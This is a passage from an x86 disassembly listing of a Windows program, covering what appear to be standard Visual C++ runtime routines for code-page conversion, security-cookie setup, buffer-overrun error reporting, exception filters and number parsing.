arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_42CB80
call __SEH_prolog
mov eax, dword_432A48
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_420471
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, dword_4221B4
call esi ; GetCPInfo
test eax, eax
jz short loc_42032F
cmp [ebp+var_40], 1
jnz short loc_42032F
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_42032F
cmp [ebp+var_40], 1
jnz short loc_42032F
mov [ebp+var_2C], 1
loc_42032F: ; CODE XREF: sub_4202C8+45�j
; sub_4202C8+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_42034E
cmp ebx, 0FFFFFFFFh
jz short loc_42033D
mov esi, ebx
jmp short loc_420349
; ---------------------------------------------------------------------------
loc_42033D: ; CODE XREF: sub_4202C8+6F�j
push [ebp+arg_8]
call sub_419D00
pop ecx
mov esi, eax
inc esi
loc_420349: ; CODE XREF: sub_4202C8+73�j
mov [ebp+var_44], esi
jmp short loc_420351
; ---------------------------------------------------------------------------
loc_42034E: ; CODE XREF: sub_4202C8+6A�j
mov esi, [ebp+var_44]
loc_420351: ; CODE XREF: sub_4202C8+84�j
cmp [ebp+var_2C], edi
jnz short loc_420370
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4220D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_4203C8
loc_420370: ; CODE XREF: sub_4202C8+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41E880
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4203B4
; ---------------------------------------------------------------------------
loc_42039D: ; DATA XREF: .text:stru_42CB80�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4203A1: ; DATA XREF: .text:stru_42CB80�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_4203B4: ; CODE XREF: sub_4202C8+D3�j
cmp ebx, edi
jnz short loc_4203D6
push esi
push 2
call sub_41E5AE
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_4203CF
loc_4203C8: ; CODE XREF: sub_4202C8+A6�j
xor eax, eax
jmp loc_420483
; ---------------------------------------------------------------------------
loc_4203CF: ; CODE XREF: sub_4202C8+FE�j
mov [ebp+var_24], 1
loc_4203D6: ; CODE XREF: sub_4202C8+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz loc_420474
cmp [ebp+arg_10], edi
jz short loc_420416
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz short loc_420474
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_420474
; ---------------------------------------------------------------------------
loc_420416: ; CODE XREF: sub_4202C8+12C�j
cmp [ebp+var_2C], edi
jnz short loc_420431
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_420474
loc_420431: ; CODE XREF: sub_4202C8+151�j
push esi
push 1
call sub_41E5AE
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_420474
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_4220D8 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_420464
push [ebp+var_20]
call sub_416C97
pop ecx
mov [ebp+var_20], edi
jmp short loc_420474
; ---------------------------------------------------------------------------
loc_420464: ; CODE XREF: sub_4202C8+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_420474
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_420474
; ---------------------------------------------------------------------------
loc_420471: ; CODE XREF: sub_4202C8+30�j
mov ebx, [ebp+var_48]
loc_420474: ; CODE XREF: sub_4202C8+123�j
; sub_4202C8+144�j ...
cmp [ebp+var_24], edi
jz short loc_420480
push ebx
call sub_416C97
pop ecx
loc_420480: ; CODE XREF: sub_4202C8+1AF�j
mov eax, [ebp+var_20]
loc_420483: ; CODE XREF: sub_4202C8+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41C526
call __SEH_epilog
retn
sub_4202C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420497 proc near ; DATA XREF: .text:0042E004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call dword_422160 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_4220F8 ; GetCurrentProcessId
xor esi, eax
call dword_422178 ; GetCurrentThreadId
xor esi, eax
call dword_42201C ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_432A48, esi
jnz short loc_4204EA
mov dword_432A48, 0BB40E64Eh
loc_4204EA: ; CODE XREF: sub_420497+47�j
pop esi
leave
retn
sub_420497 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204ED proc near ; CODE XREF: sub_41C526-1D�p
var_140 = dword ptr -140h
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_42CD30
call __SEH_prolog
mov eax, dword_432A48
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_4814BC
xor ecx, ecx
cmp eax, ecx
jz short loc_420531
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_42051F: ; CODE XREF: sub_4204ED+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_42062F
; ---------------------------------------------------------------------------
loc_420528: ; DATA XREF: .text:stru_42CD30�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_42052C: ; DATA XREF: .text:stru_42CD30�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_42051F
; ---------------------------------------------------------------------------
loc_420531: ; CODE XREF: sub_4204ED+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_42054A
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_42055B
; ---------------------------------------------------------------------------
loc_42054A: ; CODE XREF: sub_4204ED+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_42055B: ; CODE XREF: sub_4204ED+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call dword_42200C ; GetModuleFileNameA
test eax, eax
jnz short loc_420588
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_41BF70
pop ecx
pop ecx
loc_420588: ; CODE XREF: sub_4204ED+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_419D00
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_4205CC
lea eax, [ebp+var_128]
push eax
call sub_419D00
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_4169C0
add esp, 10h
loc_4205CC: ; CODE XREF: sub_4204ED+B4�j
push ebx
call sub_419D00
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_41BF70
mov edi, offset asc_42C990 ; "\n\n"
push edi
push esi
call sub_41BF80
push offset dword_42CB8C
push esi
call sub_41BF80
push ebx
push esi
call sub_41BF80
push edi
push esi
call sub_41BF80
push [ebp+var_20]
push esi
call sub_41BF80
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_42077B
add esp, 3Ch
loc_42062F: ; CODE XREF: sub_4204ED+36�j
push 3
call sub_4183C4
int 3 ; Trap to Debugger
loc_420637: ; DATA XREF: sub_42067D�o
; .text:00432A4C�o
push esi
mov esi, [esp+148h+var_140]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_42065A
cmp dword ptr [eax+10h], 3
jnz short loc_42065A
cmp dword ptr [eax+14h], 19930520h
jnz short loc_42065A
call sub_41CE51
loc_42065A: ; CODE XREF: sub_4204ED+157�j
; sub_4204ED+15D�j ...
mov eax, dword_4814C0
test eax, eax
jz short loc_420677
push eax
call sub_4206D5
test eax, eax
pop ecx
jz short loc_420677
push esi
call dword_4814C0
jmp short loc_420679
; ---------------------------------------------------------------------------
loc_420677: ; CODE XREF: sub_4204ED+174�j
; sub_4204ED+17F�j
xor eax, eax
loc_420679: ; CODE XREF: sub_4204ED+188�j
pop esi
retn 4
sub_4204ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42067D proc near ; DATA XREF: .text:0042E01C�o
push offset loc_420637
call dword_422148 ; SetUnhandledExceptionFilter
mov dword_4814C0, eax
xor eax, eax
retn
sub_42067D endp
; =============== S U B R O U T I N E =======================================
sub_420690 proc near ; DATA XREF: .text:0042E034�o
push dword_4814C0
call dword_422148 ; SetUnhandledExceptionFilter
retn
sub_420690 endp
; =============== S U B R O U T I N E =======================================
sub_42069D proc near ; CODE XREF: sub_41C92A+53�p
; sub_41C92A+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_422144 ; IsBadReadPtr
test eax, eax
jz short loc_4206B5
xor esi, esi
loc_4206B5: ; CODE XREF: sub_42069D+14�j
mov eax, esi
pop esi
retn
sub_42069D endp
; =============== S U B R O U T I N E =======================================
sub_4206B9 proc near ; CODE XREF: sub_41C92A+65�p
; sub_41C92A+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call dword_422198 ; IsBadWritePtr
test eax, eax
jz short loc_4206D1
xor esi, esi
loc_4206D1: ; CODE XREF: sub_4206B9+14�j
mov eax, esi
pop esi
retn
sub_4206B9 endp
; =============== S U B R O U T I N E =======================================
sub_4206D5 proc near ; CODE XREF: sub_41C92A+128�p
; sub_4204ED+177�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call dword_422140 ; IsBadCodePtr
test eax, eax
jz short loc_4206E9
xor esi, esi
loc_4206E9: ; CODE XREF: sub_4206D5+10�j
mov eax, esi
pop esi
retn
sub_4206D5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CE51
loc_4206ED: ; CODE XREF: sub_41CE51:loc_41CE81�j
push 0Ah
call sub_41D8F7
push 16h
call sub_421383
pop ecx
pop ecx
push 3
call sub_4183C4
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41CE51
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420705 proc near ; CODE XREF: sub_41D4FC+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_42CD40
call __SEH_prolog
cmp dword_482964, 3
jnz short loc_420754
push 4
call sub_41A166
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_41A1DF
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_420742
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_420745
; ---------------------------------------------------------------------------
loc_420742: ; CODE XREF: sub_420705+30�j
mov esi, [ebp+var_20]
loc_420745: ; CODE XREF: sub_420705+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_420772
cmp [ebp+var_1C], 0
jnz short loc_420767
loc_420754: ; CODE XREF: sub_420705+13�j
push [ebp+arg_0]
push 0
push dword_482960
call dword_42213C ; RtlSizeHeap
mov esi, eax
loc_420767: ; CODE XREF: sub_420705+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_420705 endp
; =============== S U B R O U T I N E =======================================
sub_42076F proc near ; DATA XREF: .text:stru_42CD40�o
mov esi, [ebp-20h]
sub_42076F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420772 proc near ; CODE XREF: sub_420705+44�p
push 4
call sub_41A0D2
pop ecx
retn
sub_420772 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42077B proc near ; CODE XREF: sub_41D8F7+132�p
; sub_4204ED+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_4814C4, ebx
push esi
push edi
jnz short loc_4207FB
push offset aUser32_dll ; "user32.dll"
call dword_422088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_420836
mov esi, dword_422084
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4814C4, eax
jz short loc_420836
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_4814C8, eax
call esi ; GetProcAddress
cmp dword_481164, 2
mov dword_4814CC, eax
jnz short loc_4207FB
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_4814D4, eax
jz short loc_4207FB
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_4814D0, eax
loc_4207FB: ; CODE XREF: sub_42077B+11�j
; sub_42077B+60�j ...
mov eax, dword_4814D0
test eax, eax
jz short loc_420840
call eax ; GetProcessWindowStation
test eax, eax
jz short loc_420827
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_4814D4 ; GetUserObjectInformationA
test eax, eax
jz short loc_420827
test [ebp+var_8], 1
jnz short loc_420840
loc_420827: ; CODE XREF: sub_42077B+8D�j
; sub_42077B+A4�j
cmp dword_481170, 4
jb short loc_42083A
or [ebp+arg_A], 20h
jmp short loc_42085F
; ---------------------------------------------------------------------------
loc_420836: ; CODE XREF: sub_42077B+22�j
; sub_42077B+3D�j
xor eax, eax
jmp short loc_42086F
; ---------------------------------------------------------------------------
loc_42083A: ; CODE XREF: sub_42077B+B3�j
or [ebp+arg_A], 4
jmp short loc_42085F
; ---------------------------------------------------------------------------
loc_420840: ; CODE XREF: sub_42077B+87�j
; sub_42077B+AA�j
mov eax, dword_4814C8
test eax, eax
jz short loc_42085F
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_42085F
mov eax, dword_4814CC
test eax, eax
jz short loc_42085F
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_42085F: ; CODE XREF: sub_42077B+B9�j
; sub_42077B+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_4814C4 ; MessageBoxA
loc_42086F: ; CODE XREF: sub_42077B+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_42077B endp
; =============== S U B R O U T I N E =======================================
sub_420874 proc near ; CODE XREF: sub_4208A5+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_481701[eax], cl
jnz short loc_4208A1
cmp [esp+arg_4], 0
jz short loc_42089A
movzx eax, word_42C182[eax*2]
and eax, [esp+arg_4]
jmp short loc_42089C
; ---------------------------------------------------------------------------
loc_42089A: ; CODE XREF: sub_420874+16�j
xor eax, eax
loc_42089C: ; CODE XREF: sub_420874+24�j
test eax, eax
jnz short loc_4208A1
retn
; ---------------------------------------------------------------------------
loc_4208A1: ; CODE XREF: sub_420874+F�j
; sub_420874+2A�j
xor eax, eax
inc eax
retn
sub_420874 endp
; =============== S U B R O U T I N E =======================================
sub_4208A5 proc near ; CODE XREF: sub_41DC0B+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_420874
add esp, 0Ch
retn
sub_4208A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4208B6 proc near ; CODE XREF: sub_41E269+54�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_41F50B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_4208E7
call sub_41B935
mov dword ptr [eax], 9
jmp short loc_420910
; ---------------------------------------------------------------------------
loc_4208E7: ; CODE XREF: sub_4208B6+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call dword_422090 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_420916
call dword_422004 ; RtlGetLastWin32Error
test eax, eax
jz short loc_420916
push eax
call sub_41B947
pop ecx
loc_420910: ; CODE XREF: sub_4208B6+2F�j
mov eax, edi
mov edx, edi
jmp short loc_420935
; ---------------------------------------------------------------------------
loc_420916: ; CODE XREF: sub_4208B6+47�j
; sub_4208B6+51�j
mov eax, esi
sar eax, 5
mov eax, dword_4815E0[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_420935: ; CODE XREF: sub_4208B6+5E�j
pop edi
pop esi
leave
retn
sub_4208B6 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
mov al, 0FFh
mov edi, edi
loc_420950: ; CODE XREF: .text:00420960�j
; .text:00420980�j
or al, al
jz short loc_420986
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_420950
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_420950
sbb al, al
sbb al, 0FFh
loc_420986: ; CODE XREF: .text:00420952�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42098E proc near ; CODE XREF: sub_41F885+2BD�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_416B20
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_41D676
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_420AB8
push 2
push esi
push [ebp+arg_0]
call sub_41D676
add esp, 0Ch
cmp eax, ebx
jz loc_420AB8
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_420A5B
mov ebx, 1000h
push ebx
lea eax, [ebp+var_100C]
push esi
push eax
call sub_41E880
push 8000h
push [ebp+arg_0]
call sub_421561
add esp, 14h
mov [ebp+var_C], eax
loc_420A0C: ; CODE XREF: sub_42098E+A2�j
cmp edi, ebx
mov eax, ebx
jge short loc_420A14
mov eax, edi
loc_420A14: ; CODE XREF: sub_42098E+82�j
push eax
lea eax, [ebp+var_100C]
push eax
push [ebp+arg_0]
call sub_41E269
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_420A34
sub edi, eax
test edi, edi
jg short loc_420A0C
jmp short loc_420A4C
; ---------------------------------------------------------------------------
loc_420A34: ; CODE XREF: sub_42098E+9C�j
call sub_41B93E
cmp dword ptr [eax], 5
jnz short loc_420A49
call sub_41B935
mov dword ptr [eax], 0Dh
loc_420A49: ; CODE XREF: sub_42098E+AE�j
or esi, 0FFFFFFFFh
loc_420A4C: ; CODE XREF: sub_42098E+A4�j
push [ebp+var_C]
push [ebp+arg_0]
call sub_421561
pop ecx
pop ecx
jmp short loc_420AA3
; ---------------------------------------------------------------------------
loc_420A5B: ; CODE XREF: sub_42098E+56�j
jge short loc_420AA3
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D676
push [ebp+arg_0]
call sub_41F50B
add esp, 10h
push eax
call dword_422138 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_420AA3
call sub_41B935
mov dword ptr [eax], 0Dh
call sub_41B93E
mov edi, eax
call dword_422004 ; RtlGetLastWin32Error
mov [edi], eax
loc_420AA3: ; CODE XREF: sub_42098E+CB�j
; sub_42098E:loc_420A5B�j ...
push 0
push [ebp+var_8]
push [ebp+arg_0]
call sub_41D676
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_420ABA
; ---------------------------------------------------------------------------
loc_420AB8: ; CODE XREF: sub_42098E+32�j
; sub_42098E+48�j
mov eax, ebx
loc_420ABA: ; CODE XREF: sub_42098E+128�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_41C526
leave
retn
sub_42098E endp
; =============== S U B R O U T I N E =======================================
sub_420AC9 proc near ; CODE XREF: sub_41FBF3+23�p
; sub_41FBF3+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_420ADF
cmp ecx, esi
jnb short loc_420AE2
loc_420ADF: ; CODE XREF: sub_420AC9+10�j
xor eax, eax
inc eax
loc_420AE2: ; CODE XREF: sub_420AC9+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_420AC9 endp
; =============== S U B R O U T I N E =======================================
sub_420AEA proc near ; CODE XREF: sub_420BA3+4B�p
; sub_420BA3+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_420AC9
add esp, 0Ch
test eax, eax
jz short loc_420B1C
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_420AC9
add esp, 0Ch
test eax, eax
jz short loc_420B1C
inc dword ptr [esi+8]
loc_420B1C: ; CODE XREF: sub_420AEA+19�j
; sub_420AEA+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_420AC9
add esp, 0Ch
test eax, eax
jz short loc_420B34
inc dword ptr [esi+8]
loc_420B34: ; CODE XREF: sub_420AEA+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_420AC9
add esp, 0Ch
pop edi
pop esi
retn
sub_420AEA endp
; =============== S U B R O U T I N E =======================================
sub_420B48 proc near ; CODE XREF: sub_420BA3+3B�p
; sub_420BA3+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_420B48 endp
; =============== S U B R O U T I N E =======================================
sub_420B76 proc near ; CODE XREF: sub_4210C1+1C1�p
; sub_4215C3+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_420B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BA3 proc near ; CODE XREF: sub_420C87+362�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_420C21
mov [ebp+arg_8], eax
loc_420BD5: ; CODE XREF: sub_420BA3+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_420B48
push ebx
call sub_420B48
lea eax, [ebp+var_14]
push eax
push ebx
call sub_420AEA
push ebx
call sub_420B48
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_420AEA
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_420BD5
xor edx, edx
loc_420C21: ; CODE XREF: sub_420BA3+2D�j
cmp [ebx+8], edx
jnz short loc_420C55
mov edi, [ebx+8]
loc_420C29: ; CODE XREF: sub_420BA3+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_420C29
mov [ebx+8], edi
loc_420C55: ; CODE XREF: sub_420BA3+81�j
mov esi, 8000h
jmp short loc_420C6A
; ---------------------------------------------------------------------------
loc_420C5C: ; CODE XREF: sub_420BA3+CA�j
push ebx
call sub_420B48
add [ebp+var_8], 0FFFFh
pop ecx
loc_420C6A: ; CODE XREF: sub_420BA3+B7�j
test [ebx+8], esi
jz short loc_420C5C
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_41C526
leave
retn
sub_420BA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420C87 proc near ; CODE XREF: sub_41FEE5+22�p
; sub_41FF28+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
xor eax, eax
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+var_58]
mov [ebp+var_8], esi
mov [ebp+var_2C], eax
mov [ebp+var_1C], 1
mov [ebp+var_C], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_420CC8: ; CODE XREF: sub_420C87+58�j
mov cl, [edi]
